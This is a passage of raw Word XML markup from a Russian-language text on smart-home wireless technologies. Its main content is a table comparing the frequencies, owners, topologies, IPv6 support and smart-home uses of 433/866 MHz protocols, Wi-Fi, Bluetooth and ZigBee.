        <w:t>или приложения. Это дает потребителям и поставщикам услуг предоставляет более широкий выбор продукции по типу, стилю и применению.</w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00F00A9D">
        <w:t>[10]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A3D41" w:rsidRPr="000C799E" w:rsidRDefault="009A3D41" w:rsidP="00C07525"/>
    <w:p w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidRDefault="00DE7A4D" w:rsidP="00F57840">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Сравнение беспроводных технологий</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9584" w:type="dxa"/>
        <w:tblInd w:w="-152" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1506"/>
        <w:gridCol w:w="2418"/>
        <w:gridCol w:w="1414"/>
        <w:gridCol w:w="2276"/>
        <w:gridCol w:w="1795"/>
        <w:gridCol w:w="175"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidTr="002F2E28">
        <w:trPr>
          <w:trHeight w:val="94"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506"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E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>Протокол</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2418"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E7A4D" w:rsidRPr="00E5799C" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>Частота</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1414" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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E7A4D" w:rsidRPr="00E5799C" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>Владелец</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>протокола</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2276" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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E7A4D" w:rsidRPr="00E5799C" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
                <w:highlight w:val="lightGray"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Может использоваться в умном доме для</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1795" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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E7A4D" w:rsidRPr="00E5799C" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>Не</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>может</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>использоваться</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>для</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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2F2E28">
        <w:trPr>
          <w:trHeight w:val="217"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506" w:type="dxa"/>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DE7A4D" w:rsidRPr="000C799E" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2418" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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E7A4D" w:rsidRPr="00E5799C" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>Базовый</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>радиостандарт</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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2F2E28">
        <w:trPr>
          <w:trHeight w:val="217"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506" w:type="dxa"/>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D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="00E5799C" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:highlight w:val="lightGray"/>
              </w:rPr>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2F2E28">
        <w:trPr>
          <w:trHeight w:val="217"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506" w:type="dxa"/>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E7A4D" w:rsidRPr="00E5799C" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>Топография</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>сети</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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2F2E28">
        <w:trPr>
          <w:trHeight w:val="217"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506" w:type="dxa"/>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DE7A4D" w:rsidRPr="000C799E" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2418" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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DE7A4D" w:rsidRPr="00E5799C" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t>Поддержка</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E5799C">
              <w:rPr>
                <w:highlight w:val="lightGray"/>
                <w:shd w:val="clear" w:color="auto" w:fill="C0C0C0"/>
              </w:rPr>
              <w:t> IPv6</w:t>
            </w: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2F2E28"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2F2E28">
        <w:trPr>
          <w:trHeight w:val="217"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506" w:type="dxa"/>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D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="000C799E"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0C799E"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0C799E" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>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C07525" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="280"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506"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Протоколы</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> 433 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>МГц</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> и 866 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>МГц</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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433 МГц и 866 МГц, может работать одновременно с</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t> Wi</w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1414"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Отдельные</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>небольшие</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>компании</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2276"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Для решения конкретных небольших задач в составе системы умного дома</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1795"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Для создания комплексной системы умного дома</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="175" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="00C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="23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C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>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w:t>
            </w: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30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Точка</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>точка</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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196"/>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Нет</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506"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Wi-Fi</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="333333"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>b/g/n</w:t>
            </w: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 xml:space="preserve">2,4 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>ГГц</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1414"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Открытый</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>протокол</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2276"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Обе</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>печения доступа в интернет компонентам системы и</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>передачи потокового видео с камер</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1795"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Обмена</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>информацией</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> с </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>датчиками</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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232"/>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IEEE 802.11</w:t>
            </w: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135"/>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Звезда</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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182"/>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Да</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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C07525" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506"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Bluetooth 4.1</w:t>
            </w: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2,4 ГГц, может работать одновременно с</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t> Wi</w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1414"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Открытый</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>протокол</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4071" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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 xml:space="preserve">В настоящее время протокол </w:t>
            </w:r>
            <w:r w:rsidR="009A3D41" w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>не часто</w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> используется в умном доме</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="175" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="00C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="29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C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>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IEEE 802.15.4</w:t>
            </w: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gridSpan w:val="2"/>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26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Точка</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>точка</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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gridSpan w:val="2"/>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25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806F99" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>Только</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>версии</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> BLE</w:t>
            </w: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gridSpan w:val="2"/>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C07525" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="260"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1506"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ZigBee</w:t>
            </w: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2,4 ГГц, может работать одновременно с</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t> Wi</w:t>
            </w:r>
            <w:r w:rsidRPr="00C07525">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
              </w:rPr>
              <w:t>Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1414"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ZigBee Alliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4071" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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В настоящее время протокол не особенно часто используется в умном доме</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="175" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DE7A4D" w:rsidRPr="00C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE7A4D" w:rsidRPr="000C799E" w:rsidTr="00C07525">
        <w:trPr>
          <w:trHeight w:val="21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C07525" w:rsidRDefault="00DE7A4D" w:rsidP="00C07525">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:lang w:val="ru-RU"/>
              </w:rPr>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IEEE 802.15.4</w:t>
            </w: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gridSpan w:val="2"/>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27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Ячеистая</w:t>
            </w:r>
